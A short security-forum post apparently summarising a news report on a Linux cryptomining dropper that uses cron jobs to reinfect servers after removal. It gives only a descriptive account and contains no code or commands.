Cryptominer Uses Cron To Reinfect Linux Host After Removal

silversurfer

Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Well-known
Aug 17, 2014
10,055
A cryptomining dropper malware has been spotted by security researchers while gaining persistence on Linux hosts by adding cron jobs to reinfect the compromised machines after being removed.

The malware was initially discovered on a web server with a maxed out CPU by a malicious process, a sure sign of a host infected with cryptomining malware configured to use all available computing resources.

As Sucuri's security analyst Luke Leal found after taking a closer look, the cryptominer is downloaded by attackers using a Bash script dropped on the server via an unknown method — most probably after exploiting an unpatched vulnerability, brute forcing their way in, or by phishing the admin credentials.
 

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top